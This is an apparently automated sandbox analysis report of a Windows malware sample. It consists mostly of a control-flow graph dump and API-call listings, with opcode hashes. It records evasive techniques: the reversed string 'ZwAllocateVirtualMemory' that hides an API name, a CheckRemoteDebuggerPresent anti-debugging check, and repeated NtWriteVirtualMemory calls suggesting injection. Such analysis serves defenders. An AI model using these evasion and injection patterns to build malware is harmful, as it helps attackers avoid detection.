27112->27131 27117 2cd5b68 27113->27117 27120 2cd3e9d 27114->27120 27116 2cd7ebe 27115->27116 27118 2cd7e42 27115->27118 27123 2cd7edf 27116->27123 27119 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27117->27119 27126 2cd7e6e 27118->27126 27121 2cd5b74 27119->27121 27125 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27120->27125 27133 2cd5ba0 27121->27133 27122 2cd9420 27124 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27122->27124 27135 2cd7ef7 27123->27135 27143 2cd949c 27124->27143 27127 2cd3ec1 27125->27127 27132 2cd7ea5 27126->27132 27130 2cc870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27127->27130 27128->27122 27129 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27128->27129 27145 2cd8d0b 27129->27145 27138 2cd3ec6 27130->27138 27134 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27131->27134 27136 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27132->27136 27139 2cd5bd7 27133->27139 27149 2cd7369 27134->27149 27137 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27135->27137 27136->27116 27140 2cd7f3a 27137->27140 27147 2cd3f03 27138->27147 27141 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27139->27141 27152 2cd7f73 27140->27152 27142 2cd5bf0 27141->27142 27146 2cd5c01 27142->27146 27144 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27143->27144 27158 2cd9518 27144->27158 27148 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27145->27148 27154 2cd5c36 27146->27154 27151 2cd3f3c 27147->27151 27162 2cd8d87 27148->27162 27150 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27149->27150 27166 2cd73e5 27150->27166 27155 2cd3f73 27151->27155 27153 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27152->27153 27157 2cd7fb6 27153->27157 27160 2cd5c6f 27154->27160 27156 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27155->27156 27161 2cd3f7f 27156->27161 27175 2cd8009 27157->27175 27159 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27158->27159 27165 2cd9594 27159->27165 27164 2cd5ca6 27160->27164 27167 2cd3fab 27161->27167 27163 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27162->27163 27193 2cd8e03 27163->27193 27168 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27164->27168 27169 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27165->27169 27173 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27166->27173 27170 2cd3fd7 27167->27170 27171 2cd5cb2 27168->27171 27174 2cd95c7 27169->27174 27172 2cd3fe2 27170->27172 27180 2cd5cde 27171->27180 27176 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27172->27176 27188 2cd7480 27173->27188 27177 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27174->27177 27179 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27175->27179 27178 2cd3ffb 27176->27178 27182 2cd95fa 27177->27182 27183 2cd401c 27178->27183 27181 2cd8064 27179->27181 27185 2cd5d15 27180->27185 27194 2cd8085 27181->27194 27184 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27182->27184 27187 2cd4053 27183->27187 27191 2cd962d 27184->27191 27186 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27185->27186 27189 2cd5d2e 27186->27189 27192 2cd405e 27187->27192 27190 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27188->27190 27198 2cd5d4f 27189->27198 27204 2cd74fc 27190->27204 27195 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27191->27195 27196 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27192->27196 27197 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27193->27197 27200 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27194->27200 27207 2cd9660 27195->27207 27199 2cd4077 27196->27199 27210 2cd8eda 27197->27210 27201 2cd5d86 27198->27201 27202 2cd4098 27199->27202 27213 2cd80e0 27200->27213 27203 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27201->27203 27208 2cd40cf 27202->27208 27205 2cd5daa 27203->27205 27206 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27204->27206 27219 2cd5dd6 27205->27219 27229 2cd7578 27206->27229 27209 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27207->27209 27212 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27208->27212 27223 2cd96dc 27209->27223 27211 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27210->27211 27227 2cd8f56 27211->27227 27218 2cd40f3 27212->27218 27214 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27213->27214 27215 2cd815c 27214->27215 27216 2cccfa4 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27215->27216 27231 2cd8170 27216->27231 27217 2cd40fd 27217->27218 27222 2cd4180 27217->27222 27218->27217 27220 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27219->27220 27221 2cd5e26 27220->27221 27224 2cd5e3b 27221->27224 27241 2cd6099 27221->27241 27226 2cd41b7 27222->27226 27225 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27223->27225 27236 2cd5e5c 27224->27236 27244 2cd9758 27225->27244 27230 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27226->27230 27228 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27227->27228 27326 2cd91d4 27227->27326 27250 2cd8fe4 27228->27250 27233 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27229->27233 27234 2cd41c3 27230->27234 27235 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27231->27235 27232 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27249 2cd9296 27232->27249 27238 2cd7635 27233->27238 27237 2cd41ef 27234->27237 27252 2cd81f1 27235->27252 27239 2cd5e93 27236->27239 27242 2cd41fc 27237->27242 27240 2cc7dd8 GetModuleHandleA GetProcAddress 27238->27240 27243 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27239->27243 27262 2cd7658 27240->27262 27245 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27241->27245 27247 2cd4226 27242->27247 27248 2cd5eb7 27243->27248 27246 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27244->27246 27266 2cd6115 27245->27266 27253 2cd97d4 27246->27253 27251 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27247->27251 27259 2cd5ef0 27248->27259 27254 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27249->27254 27255 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27250->27255 27256 2cd423f 27251->27256 27257 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27252->27257 27258 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27253->27258 27272 2cd9312 27254->27272 27273 2cd9060 27255->27273 27260 2cd4260 27256->27260 27275 2cd826d 27257->27275 27261 2cd9807 27258->27261 27264 2cd5f27 27259->27264 27269 2cd4278 27260->27269 27265 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27261->27265 27263 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27262->27263 27288 2cd76d4 27263->27288 27267 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27264->27267 27270 2cd983a 27265->27270 27268 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27266->27268 27271 2cd5f33 27267->27271 27290 2cd6191 27268->27290 27274 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27269->27274 27276 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27270->27276 27282 2cd5f5f 27271->27282 27277 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27272->27277 27278 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27273->27278 27279 2cd42bb 27274->27279 27280 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27275->27280 27284 2cd986d 27276->27284 27299 2cd938e 27277->27299 27300 2cd90dc 27278->27300 27285 2cd42dc 27279->27285 27281 2cd82e9 27280->27281 27283 2cc8584 GetModuleHandleA GetProcAddress 27281->27283 27305 2cd8309 27281->27305 27286 2cd5f96 27282->27286 27283->27305 27287 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27284->27287 27293 2cd42f4 27285->27293 27291 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27286->27291 27295 2cd98a0 27287->27295 27289 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27288->27289 27313 2cd7750 27289->27313 27292 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27290->27292 27294 2cd5faf 27291->27294 27317 2cd620d 27292->27317 27296 2cd431e 27293->27296 27306 2cd5fd0 27294->27306 27298 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27295->27298 27297 2cd432b 27296->27297 27301 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27297->27301 27320 2cd98d3 27298->27320 27302 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27299->27302 27303 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27300->27303 27304 2cd4337 27301->27304 27307 2cd940a 27302->27307 27322 2cd9158 27303->27322 27308 2cc870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27304->27308 27309 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27305->27309 27315 2cd6007 27306->27315 27312 2cc8bb0 7 API calls 27307->27312 27310 2cd433c 27308->27310 27325 2cd8385 27309->27325 27311 2cd435d 27310->27311 27324 2cd4368 27311->27324 27312->27122 27314 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27313->27314 27330 2cd77cc 27314->27330 27316 2cd601f 27315->27316 27318 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27316->27318 27319 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27317->27319 27329 2cd602b 27318->27329 27333 2cd6289 27319->27333 27321 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27320->27321 27338 2cd994f 27321->27338 27323 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27322->27323 27323->27326 27327 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27324->27327 27328 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27325->27328 27326->27232 27331 2cd43b8 27327->27331 27341 2cd8401 27328->27341 27329->27241 27332 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27330->27332 27340 2cd43f1 27331->27340 27334 2cd7848 27332->27334 27335 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27333->27335 27336 2ccaf58 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27334->27336 27347 2cd6305 27335->27347 27337 2cd7859 27336->27337 27337->26158 27339 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27338->27339 27344 2cd99cb 27339->27344 27342 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27340->27342 27343 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27341->27343 27346 2cd4434 27342->27346 27350 2cd847d 27343->27350 27345 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27344->27345 27352 2cd99fe 27345->27352 27349 2cd4487 27346->27349 27348 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27347->27348 27358 2cd6381 27348->27358 27351 2cd44df 27349->27351 27354 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27350->27354 27353 2cd44ea 27351->27353 27355 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27352->27355 27356 2cd44f7 27353->27356 27365 2cd8504 27354->27365 27366 2cd9a7a 27355->27366 27357 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27356->27357 27359 2cd4503 27357->27359 27360 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27358->27360 27361 2cd4524 27359->27361 27372 2cd63fd 27360->27372 27362 2cd452f 27361->27362 27363 2cd453c 27362->27363 27364 2cd455b 27363->27364 27369 2cd4566 27364->27369 27367 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27365->27367 27368 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27366->27368 27381 2cd8580 27367->27381 27382 2cd9af6 27368->27382 27370 2cd4573 27369->27370 27371 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27370->27371 27373 2cd457f 27371->27373 27375 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27372->27375 27374 2cc870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27373->27374 27386 2cd4584 27374->27386 27399 2cd6498 27375->27399 27376 2cd458e 27377 2cd45ed 27376->27377 27378 2cd4592 27376->27378 27379 2cd460e 27377->27379 27380 2cd45a7 27378->27380 27389 2cd4619 27379->27389 27385 2cd45b8 27380->27385 27383 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27381->27383 27384 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27382->27384 27394 2cd85fc 27383->27394 27387 2cd9b72 27384->27387 27385->27386 27386->27376 27388 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27387->27388 27391 2cd9ba5 27388->27391 27390 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27389->27390 27393 2cd4669 27390->27393 27392 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27391->27392 27396 2cd9bd8 27392->27396 27397 2cd4695 27393->27397 27395 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27394->27395 27408 2cd8683 27395->27408 27398 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27396->27398 27400 2cd46cc 27397->27400 27402 2cd9c0b 27398->27402 27401 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27399->27401 27403 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27400->27403 27410 2cd6593 27401->27410 27404 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27402->27404 27405 2cd46e5 27403->27405 27413 2cd9c3e 27404->27413 27406 2cc870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27405->27406 27407 2cd46ea 27406->27407 27412 2cd473d 27407->27412 27409 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27408->27409 27416 2cd86ff 27409->27416 27411 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27410->27411 27424 2cd660f 27411->27424 27415 2cd4776 27412->27415 27414 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27413->27414 27421 2cd9cba 27414->27421 27417 2cd47ad 27415->27417 27418 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27416->27418 27419 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27417->27419 27427 2cd877b 27418->27427 27420 2cd47b9 27419->27420 27423 2cd47e5 27420->27423 27422 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27421->27422 27425 2cd9d36 27422->27425 27426 2cd481c 27423->27426 27428 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27424->27428 27430 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27425->27430 27431 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27426->27431 27429 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27427->27429 27439 2cd66c7 27428->27439 27441 2cd87f7 27429->27441 27434 2cd9d69 27430->27434 27432 2cd4835 27431->27432 27433 2cc870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27432->27433 27440 2cd483a 27433->27440 27435 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27434->27435 27437 2cd9d9c 27435->27437 27436 2cd4848 27436->27440 27438 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27437->27438 27444 2cd9dcf 27438->27444 27442 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27439->27442 27440->27436 27446 2cd48dc 27440->27446 27443 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27441->27443 27442->27445 27452 2cd8873 27443->27452 27447 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27444->27447 27445->26158 27445->26934 27448 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27446->27448 27449 2cd9e02 27447->27449 27450 2cd491f 27448->27450 27451 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27449->27451 27454 2cd4958 27450->27454 27458 2cd9e35 27451->27458 27453 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27452->27453 27462 2cd88ef 27453->27462 27455 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27454->27455 27456 2cd499b 27455->27456 27457 2cc870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27456->27457 27459 2cd49a0 27457->27459 27460 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27458->27460 27461 2cc8410 GetModuleHandleA GetProcAddress WinExec 27459->27461 27472 2cd9eb1 27460->27472 27465 2cd49b2 27461->27465 27463 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27462->27463 27464 2cd896b 27463->27464 27466 2cc87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27464->27466 27469 2cd49e8 27465->27469 27467 2cd898a 27466->27467 27468 2cc87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27467->27468 27470 2cd899e 27468->27470 27478 2cd4a1f 27469->27478 27471 2cc87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27470->27471 27473 2cd89b2 27471->27473 27475 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27472->27475 27474 2cc87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27473->27474 27476 2cd89c6 27474->27476 27484 2cd9f2d 27475->27484 27477 2cc87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27476->27477 27479 2cd89da 27477->27479 27480 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27478->27480 27481 2cc87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27479->27481 27482 2cd4a38 27480->27482 27487 2cd89ee 27481->27487 27483 2cd4a59 27482->27483 27486 2cd4a90 27483->27486 27485 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27484->27485 27492 2cd9fa9 27485->27492 27488 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27486->27488 27489 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27487->27489 27491 2cd4ab4 27488->27491 27490 2cd8a75 27489->27490 27498 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27490->27498 27494 2cd4aed 27491->27494 27493 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27492->27493 27500 2cda025 27493->27500 27495 2cd4b24 27494->27495 27496 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27495->27496 27497 2cd4b30 27496->27497 27499 2cd4b4b 27497->27499 27498->27066 27504 2cd4ba0 27499->27504 27501 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27500->27501 27502 2cda0a1 27501->27502 27503 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27502->27503 27505 2cda0b0 27503->27505 27511 2cd4bbc 27504->27511 27506 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27505->27506 27507 2cda0bf 27506->27507 27508 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27507->27508 27509 2cda0ce 27508->27509 27510 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27509->27510 27512 2cda0dd 27510->27512 27518 2cd4c0c 27511->27518 27513 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27512->27513 27514 2cda0ec 27513->27514 27515 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27514->27515 27516 2cda0fb 27515->27516 27517 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27516->27517 27519 2cda10a 27517->27519 27526 2cd4c29 27518->27526 27520 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27519->27520 27521 2cda119 27520->27521 27522 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27521->27522 27523 2cda128 27522->27523 27524 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27523->27524 27525 2cda137 27524->27525 27527 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27525->27527 27532 2cd4c4b 27526->27532 27528 2cda146 27527->27528 27529 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27528->27529 27530 2cda155 27529->27530 27531 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27530->27531 27533 2cda164 27531->27533 27532->26769 27534 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27533->27534 27535 2cda173 27534->27535 27536 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27535->27536 27537 2cda182 27536->27537 27538 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27537->27538 27539 2cda1fe 27538->27539 27540 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27539->27540 27541 2cda231 27540->27541 27542 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27541->27542 27543 2cda264 27542->27543 27544 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27543->27544 27545 2cda297 27544->27545 27546 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27545->27546 27547 2cda2ca 27546->27547 27548 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27547->27548 27549 2cda2fd 27548->27549 27550 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27549->27550 27551 2cda330 27550->27551 27552 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27551->27552 27553 2cda363 27552->27553 27554 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27553->27554 27555 2cda3df 27554->27555 27556 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27555->27556 27557 2cda45b 27556->27557 27558 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27557->27558 27559 2cda4d7 27558->27559 27560 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27559->27560 27561 2cda50a 27560->27561 27562 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27561->27562 27563 2cda53d 27562->27563 27564 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27563->27564 27565 2cda570 27564->27565 27566 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27565->27566 27567 2cda5a3 27566->27567 27568 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27567->27568 27569 2cda5d6 27568->27569 27570 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27569->27570 27571 2cda609 27570->27571 27572 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27571->27572 27573 2cda63c 27572->27573 27574 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27573->27574 27575 2cda66f 27574->27575 27576 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27575->27576 27577 2cda6a2 27576->27577 27578 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27577->27578 27579 2cda6d5 27578->27579 27580 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27579->27580 27581 2cda708 27580->27581 27582 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27581->27582 27583 2cda73b 27582->27583 27584 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27583->27584 27585 2cda76e 27584->27585 27586 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27585->27586 27587 2cda7a1 27586->27587 27588 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27587->27588 27589 2cda7d4 27588->27589 27590 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27589->27590 27591 2cda807 27590->27591 27592 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27591->27592 27593 2cda83a 27592->27593 27594 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27593->27594 27595 2cda86d 27594->27595 27596 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27595->27596 27597 2cda8a0 27596->27597 27598 2cc818c GetModuleHandleA GetProcAddress FlushInstructionCache 27597->27598 27599 2cda8af 27598->27599 27600 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27599->27600 27601 2cda92b 27600->27601 27602 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27601->27602 27603 2cda9a7 27602->27603 27604 2cc8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 27603->27604 27604->27605 27607 2cc871a 27606->27607 27627 2cc80c8 27607->27627 27609 2cc8745 27631 2cc7d00 27609->27631 27611 2cc8773 27611->26162 27613 2cc8838 27612->27613 27614 2cc8020 2 API calls 27613->27614 27615 2cc886d 27614->27615 27616 2cc80c8 GetProcAddress 27615->27616 27617 2cc8886 27616->27617 27618 2cc7d00 3 API calls 27617->27618 27619 2cc88e5 27618->27619 27619->26166 27622 2ccec05 27620->27622 27621 2ccec32 27621->26189 27622->27621 27623 2ccec20 CheckRemoteDebuggerPresent 27622->27623 27623->27621 27625 2cb46aa 27624->27625 27626->26670 27628 2cc80ed 27627->27628 27629 2cc8120 GetProcAddress 27628->27629 27630 2cc814f 27629->27630 27630->27609 27632 2cc7d25 27631->27632 27638 2cc8020 27632->27638 27634 2cc7d55 27635 2cc80c8 GetProcAddress 27634->27635 27636 2cc7d5b NtWriteVirtualMemory 27635->27636 27637 2cc7d94 27636->27637 27637->27611 27639 2cc8043 27638->27639 27640 2cc80c8 GetProcAddress 27639->27640 27641 2cc8069 GetModuleHandleA 27640->27641 27642 2cc808f 27641->27642 27642->27634

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072
                                                                    • Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D
                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CC7A27
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd
                                                                  Similarity
                                                                  • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                  • API String ID: 421316089-445027087
                                                                  • Opcode ID: e6fdf6f1a810017f3fb45acf3788dbd3e6705aaa12a748cae46676870fb10223
                                                                  • Instruction ID: ed1d10965a52677eb7627e1799324b798f0ad3e881461283b5dbd8a4706b7500
                                                                  • Opcode Fuzzy Hash: e6fdf6f1a810017f3fb45acf3788dbd3e6705aaa12a748cae46676870fb10223
                                                                  • Instruction Fuzzy Hash: FA113574644208BFEB15EFA4DC51EAEB7ADEB48710F618868F904D7A41DA30EE149F60

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02CC8020: GetModuleHandleA.KERNELBASE(?), ref: 02CC8072
                                                                    • Part of subcall function 02CC80C8: GetProcAddress.KERNEL32(?,?), ref: 02CC812D
                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CC7A27
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2404968274.0000000002CB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CB1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_2cb1000_Cpbxcxnx.jbxd
                                                                  Similarity
                                                                  • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                  • API String ID: 421316089-445027087
                                                                  • Opcode ID: 9dab1236a26cbebcaa6dc9851b1c5418d144d65b2d30c38d82b57ea516be24ca
